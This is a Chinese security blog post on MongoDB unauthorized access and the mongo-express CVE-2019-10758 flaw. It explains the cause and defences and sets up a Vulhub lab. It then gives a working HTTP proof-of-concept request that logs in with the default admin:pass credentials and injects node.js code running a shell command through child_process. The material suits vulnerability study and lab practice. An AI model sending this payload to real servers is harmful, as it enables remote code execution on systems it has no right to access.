MongoDB未授权漏洞

最新推荐文章于 2024-07-30 11:27:21 发布
最新推荐文章于 2024-07-30 11:27:21 发布
阅读量1k 收藏
点赞数
文章标签: css 安全 nagios git less
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/116725637
版权


Mongo未授权访问漏洞

产生原因

由于3.0版本以前MongoDB服务启用后监听地址为0.0.0.0,导致无需授权远程访问数据库

利用方法

mongo x.x.x.x

防御方法

1、主机防火墙启用授信主机IP访问
2、修改监听地址为127.0.0.1或指定地址
3、启用级域角色的登录认证

Mongo-express

CVE 2019-10758

版本:<0.54.0

简介

Mongo-express是MongoDB的一款第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。

环境搭建

Vulhub

https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/
docker-compose up -d


POC

POST /checkValid HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124


document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

发送构造的数据包


好书推荐

贾平凹刺穿命运之作,写给每一个在浮华都市里身心俱疲、困惑止步、孤独前行的你。每一本都是镜子,给你看清自己和人性;四本一起是利剑,你便可穿透命运的厚墙!

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

NowSec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MongoDB数据库授权访问漏洞及加固
weixin_34268579的博客
01-13 713
近日安全团队经检测发现部分阿里云用户存在MongoDB数据库授权访问漏洞漏洞危害严重,可以导致数据库数据泄露或被删除勒索,从而造成严重的生产事故。为保证您的业务和应用的安全,提供以下修复漏洞指导方案。 具体漏洞详情如下: 1.漏洞危害 开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访...
MongoDB 授权访问漏洞
锋刃科技的博客
07-02 1485
前言 MongoDB 是一个基于分布式文件存储的数据库 漏洞分析 Mongodb 在启动的时候提供了很多参数,如日志记录到哪个文件夹,是否开启认证等。造成授权访问的根本原因就在于启动 Mongodb 的时候设置 --auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。 环境搭建 使用docker来搜索镜像,并拉取排名靠前的 docker search mongodb docker pull mongo
Python武器库开发-武器库篇之Mongodb授权漏洞扫描器(五十六)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-16 929
MongoDB是一款非常受欢迎的开源NoSQL数据库,广泛应用于各种Web应用和移动应用中。然而,由于默认配置的不当或者管理员的疏忽,导致不少MongoDB数据库处于授权访问的状态,从而产生了潜在的安全风险。授权访问漏洞指的是在MongoDB数据库中,没有设置正确的访问控制权限,导致攻击者可以直接访问数据库,获取或者修改敏感数据。这种漏洞的出现主要有以下几个原因:默认配置问题:MongoDB在默认情况下是没有开启身份验证机制的,这就意味着任何人都可以直接连接数据库并执行操作。
授权访问MongoDB授权访问漏洞
qq_68163788的博客
05-09 2718
授权访问MongoDB数据库的漏洞,攻击者可以利用这个漏洞来获取敏感数据、修改数据甚至破坏数据库。漏洞通常是由于管理员正确配置访问控制、弱密码或者及时更新数据库等原因导致的。为了防止授权访问,管理员应该及时更新数据库版本、配置访问控制列表、使用强密码以及监控数据库访问日志等措施。通过加强安全措施和定期审查数据库权限,可以有效防止授权访问漏洞的利用,保护数据库安全
mongodb授权漏洞
weixin_53884648的博客
10-09 8010
mongodb 授权访问漏洞复现及修复方案总结
MongoDB授权访问漏洞
Kevin's Blog
07-24 5644
文章目录一、漏洞介绍1.1 漏洞成因1.2 漏洞危害二、漏洞利用三、防御建议 一、漏洞介绍 1.1 漏洞成因   MongoDB服务安装后,默认开启权限验证。且端口对外开放MongoDB服务。 1.2 漏洞危害   攻击者无需认证连接数据库后对数据库进行任意操作(增、删、改、查高危动作),存在严重的数据泄露风险。 二、漏洞利用 Nmap扫描站点MongoDB的端口是否对公网开放: 安装配置MongoDB(方法略) 远程尝试登陆查看是否限制: 执行数据库命令: Windows可以使用命令行方式查看,
MongoDB 授权访问漏洞学习
ximo的博客
05-14 732
漏洞简介 MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。 MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。 造成授权访问的根本原因就在于启动 Mongodb 的时候设置 --auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。 环境搭建 这里使用的是kali linux。 dock
mongodb授权漏洞加固.pdf
03-15
### MongoDB授权访问漏洞及其加固方法 #### 一、MongoDB简介与安装 MongoDB是一款开源的NoSQL数据库系统,采用文档数据模型,提供高性能、高可用性和易扩展性。由于其灵活的数据模型和分布式特性,在大数据处理...
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
Python-用于快速探测授权MongoDB数据库结构
08-10
标题 "Python-用于快速探测授权MongoDB数据库结构" 暗示了这是一个利用Python编写的工具或脚本,其主要功能是针对授权MongoDB数据库进行结构检测。MongoDB是一种流行且强大的NoSQL数据库系统,由于其灵活性和...
mogodb授权访问扫描脚本
07-16
mogodb授权访问扫描脚本Python。 实例:mogodbscan.py 192.168.1.1/24
mongodb4.4.6安装包
06-24
3. **安全增强**:MongoDB持续加强安全特性,4.4.6可能包含了安全漏洞的修复和认证授权机制的强化。 4. **多文档事务**:在4.x系列中,MongoDB实现了跨文档的ACID事务,提高了应用程序的复杂性处理能力。 接下来,...
MongoDB授权访问漏洞记录(端口:27017,37017)
墨痕诉清风的博客
11-12 5287
脚本运行的条件是端口为27017或服务名称为mongodb,由于Nmap端口检测结果中的服务名称是mongod,名称不一致,脚本不运行,存在漏报。执行以下命令启动服务。认证相关官方文档该整改建议中命令方法在4.0版本中测试通过,低版本的MongoDB中,命令或角色定义可能有所变化,整改过程中,建议根据实际使用版本,查询MongoDB官方文档。,则表示数据库查询成功,存在授权访问漏洞。,建议使用1.2.1版本,使用1.3及之后版本的话,服务端如果使用较低版本MongoDB,存在授权访问时仍无法连接。...
MongoDB数据库授权访问漏洞
Fighter1028
01-15 2115
近日通过推获悉“北京某监控公司的数据库没设置密码,导致可随意访问大量公共摄像头的视频信息,漏洞估计还没修复,虽然IP被打码,只要扫描北京所有网段有授权访问漏洞的27017端口,存在漏洞的IP还是能找的到。实际操作也不复杂,安装namp后执行nmap -iL ip.txt -p 27017 --script=mongodb-info” 然后我们进行分析漏洞并复现此漏洞,图片虽然被打马赛克,但...
MongoDB授权访问漏洞验证与修复过程
心想事成
12-29 3842
Windows环境下快速修复mongodb授权
数据库安全MongoDB 授权访问漏洞.(27017端口)
最新发布
网络安全领域___专研者.
07-30 520
MongoDB是一个高性能的 NoSQL 数据库,它默认情况下不设置认证机制,这可能导致授权访问漏洞。如果MongoDB服务在没有配置任何安全措施的情况下启动,任何用户都可以通过默认端口对数据库进行操作,包括增、删、改、查等高危动作,且可以远程访问数据库.
MongoDB授权漏洞加固指南与安装教程
MongoDB授权漏洞加固是一个关于确保MongoDB数据库服务器安全的重要议题,特别是在处理敏感数据时。该文档提供了针对MongoDB 3.2版本的一个具体指南,包括了以下几个关键步骤: 1. **MongoDB安装**: - 文档首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值